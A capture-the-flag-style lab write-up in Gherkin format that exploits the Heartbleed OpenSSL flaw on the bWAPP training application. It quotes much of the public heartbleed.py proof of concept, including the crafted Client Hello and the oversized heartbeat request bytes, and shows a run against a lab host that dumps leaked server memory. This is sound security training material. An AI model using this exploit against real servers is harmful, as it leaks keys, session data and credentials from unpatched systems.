# language: en

Feature: HeartBleed Exploitation
  From system bWAPP
  From the A9 - Using Known Vulnerable Components
  With Low security level

Background:
  Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
  And I am using Firefox 52.7.3 (64-bit)
  And I am running Burp Suite Community edition v1.7.30
  And I have a some background within HeartBleed vulnerability.
  And I am ussing OpenSSL 1.1.0f
  Given the following
  """
  URL: http://localhost/bWAPP/heartbleed.php
  Message: Heartbleed Vulnerability
  Details:
      - The Nginx web server is using a vulnerable OpenSSL version!
      - HINT: login on port 8443 and launch the attack script...
  Objective: Make it bleed!
  """

Scenario: Heartbleed Vulnerability - Exploit Script
The keep-alive functionality in OpenSSL allowed an attacker
to craft a request of bigger length, thus the server would
leak information through improper input validation.
For more information check:
https://fluidattacks.com/web/en/blog/my-heart-bleeds/

  Given the vulnerability plus the hint
  Then I download the script provided
  And I take a look to the main function to see how does it work
  """
  # heartbleed.py
  # PoC CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
  # This block just parses the args sent via command line and
  # process them.
  107 def main():
  108     opts, args = options.parse_args()
  109     if len(args) < 1:
  110         options.print_help()
  111         return
  112
  """
  Then I see the socket creation
  """
  # heartbleed.py
  # Create a socket, and connect to that port,
  # then send a verification message, so the
  # Heartbeat implementation can answer back, if it is alive.
  # Then loop till one of two conditions are met:
  # 1. Closed connection -> abort
  # 2. If hexdump shows the hello done message -> Try to exploit
  #
  113     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  114     print 'Connecting...'
  115     sys.stdout.flush()
  116     s.connect((args[0], opts.port))
  117     print 'Sending Client Hello...'
  118     sys.stdout.flush()
  119     s.send(hello)
  120     print 'Waiting for Server Hello...'
  121     sys.stdout.flush()
  122     while True:
  123         typ, ver, pay = recvmsg(s)
  124         if typ == None:
  125             print 'Server closed connection without sending Server Hello.'
  126             return
  127         # Look for server hello done message.
  128         if typ == 22 and ord(pay[0]) == 0x0E:
  129             break
  130

  # hello variable, data:
  21 hello = h2bin('''
  22 16 03 02 00  dc 01 00 00 d8 03 02 53
  23 43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
  24 bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
  25 00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
  26 00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
  27 c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
  28 c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
  29 c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
  30 c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
  31 00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
  32 03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
  33 00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
  34 00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
  35 00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
  36 00 0f 00 01 01
  37 ''')
  # Which it is the size of the payload to start the heartbeat process
  """
  Then If all of that succeded, start sending heartbeat request
  And check if it is vulnerable or not
  """
  # heartbleed.py
  131     print 'Sending heartbeat request...'
  132     sys.stdout.flush()
  133     s.send(hb)
  134     hit_hb(s)
  """
  Then it sents some binary data, although much less than the initial payload
  """
  # heartbleed.py
  #
  39 hb = h2bin('''
  40 18 03 02 00 03
  41 01 40 00
  42 ''')
  43
  # Now with this little amount of binary on the payload
  # the script will be able to check if data is being
  # leaked at each response
  84 def hit_hb(s):
  85     s.send(hb)
  86     while True:
  87         typ, ver, pay = recvmsg(s)
  88         if typ is None:
  89             print 'No heartbeat response received,
                 server likely not vulnerable'
  90             return False
  91
  """
  And that leakage, it's checked here:
  """
  # heartbleed.py
  92         if typ == 24:
  93             print 'Received heartbeat response:'
  94             hexdump(pay)
  95             if len(pay) > 3:
  96                 print 'WARNING: server returned more data than
                     it should - server is vulnerab    le!'
  """

Scenario: Heartbleed Exploitation
  Given the heartbleed short explanation
  Then I first try to collect some information on the target
  """
  skorn@Morgul ~/D/f/bwapp> openssl s_client -connect 192.168.75.128:8443
  -tlsextdebug
  CONNECTED(00000003)
  TLS server extension "renegotiation info" (id=65281), len=1
  0001 - <SPACES/NULS>
  TLS server extension "EC point formats" (id=11), len=4
  0000 - 03 00 01 02                                       ....
  TLS server extension "session ticket" (id=35), len=0
  # This is what we were looking for, if the heartbeat extension
  # is activated.
  TLS server extension "heartbeat" (id=15), len=1
  0000 - 01
  ...
  ...

  Server certificate
  -----BEGIN CERTIFICATE-----
  MIIClTCCAf4CCQDYvSVKsVyfWzANBgkqhkiG9w0BAQUFADCBjjELMAkGA1UEBhMC
  QkUxETAPBgNVBAgTCEZsYW5kZXJzMQ4wDAYDVQQHEwVNZW5lbjEMMAoGA1UEChMD
  ...
  ...
  """
  Then I execute the script against the target
  """
  #
  # skorn@Morgul ~/D/s/pentest-testing> ./heartbleed.py 192.168.75.128 -p 8443
  # Connecting...
  # Sending Client Hello...
  # Waiting for Server Hello...
  #  ... received message: type = 22, ver = 0302, length = 66
  #  ... received message: type = 22, ver = 0302, length = 675
  #  ... received message: type = 22, ver = 0302, length = 203
  #  ... received message: type = 22, ver = 0302, length = 4
  # Sending heartbeat request...
  #  ... received message: type = 24, ver = 0302, length = 16384
  # Received heartbeat response:
  #   0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C
  #  .@....SC[...r...
  #  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90
  #  .+..H...9.......
  #
  # At last we got some leakage:
  00f0: 00 00 17 00 00 31 2F 58 4D 4C 53 63 68 65 6D 61  .....1/XMLSchema
  0100: 22 20 78 6D 6C 6E 73 3A 78 73 69 3D 22 68 74 74  " xmlns:xsi="htt
  0110: 70 3A 2F 2F 77 77 77 2E 77 33 2E 6F 72 67 2F 32  p://www.w3.org/2
  0120: 30 30 31 2F 58 4D 4C 53 63 68 65 6D 61 2D 69 6E  001/XMLSchema-in
  0130: 73 74 61 6E 63 65 22 20 78 6D 6C 6E 73 3A 73 6F  stance" xmlns:so
  0140: 61 70 3D 22 68 74 74 70 3A 2F 2F 73 63 68 65 6D  ap="http://schem
  0150: 61 73 2E 78 6D 6C 73 6F 61 70 2E 6F 72 67 2F 73  as.xmlsoap.org/s
  0160: 6F 61 70 2F 65 6E 76 65 6C 6F 70 65 2F 22 3E 3C  oap/envelope/"><
  0170: 73 6F 61 70 3A 48 65 61 64 65 72 3E 3C 6F 70 65  soap:Header><ope
  0180: 72 61 74 69 6F 6E 49 44 3E 30 30 30 30 30 30 30  rationID>0000000
  0190: 31 2D 30 30 30 30 30 30 30 31 3C 2F 6F 70 65 72  1-00000001</oper
  01a0: 61 74 69 6F 6E 49 44 3E 3C 2F 73 6F 61 70 3A 48  ationID></soap:H
  01b0: 65 61 64 65 72 3E 3C 73 6F 61 70 3A 42 6F 64 79  eader><soap:Body
  01c0: 3E 3C 52 65 74 72 69 65 76 65 53 65 72 76 69 63  ><RetrieveServic
  01d0: 65 43 6F 6E 74 65 6E 74 20 78 6D 6C 6E 73 3D 22  eContent xmlns="
  01e0: 75 72 6E 3A 69 6E 74 65 72 6E 61 6C 76 69 6D 32  urn:internalvim2
  01f0: 35 22 3E 3C 5F 74 68 69 73 20 78 73 69 3A 74 79  5"><_this xsi:ty
  0200: 70 65 3D 22 4D 61 6E 61 67 65 64 4F 62 6A 65 63  pe="ManagedObjec
  0210: 74 52 65 66 65 72 65 6E 63 65 22 20 74 79 70 65  tReference" type
  0220: 3D 22 53 65 72 76 69 63 65 49 6E 73 74 61 6E 63  ="ServiceInstanc
  0230: 65 22 3E 53 65 72 76 69 63 65 49 6E 73 74 61 6E  e">ServiceInstan
  0240: 63 65 3C 2F 5F 74 68 69 73 3E 3C 2F 52 65 74 72  ce</_this></Retr
  0250: 69 65 76 65 53 65 72 76 69 63 65 43 6F 6E 74 65  ieveServiceConte
  0260: 6E 74 3E 3C 2F 73 6F 61 70 3A 42 6F 64 79 3E 3C  nt></soap:Body><
  0270: 2F 73 6F 61 70 3A 45 6E 76 65 6C 6F 70 65 3E ED  /soap:Envelope>.
  0280: 7D 81 D3 08 70 AA 32 AD 86 BF EA 77 84 10 E4 D3  }...p.2....w....
  """
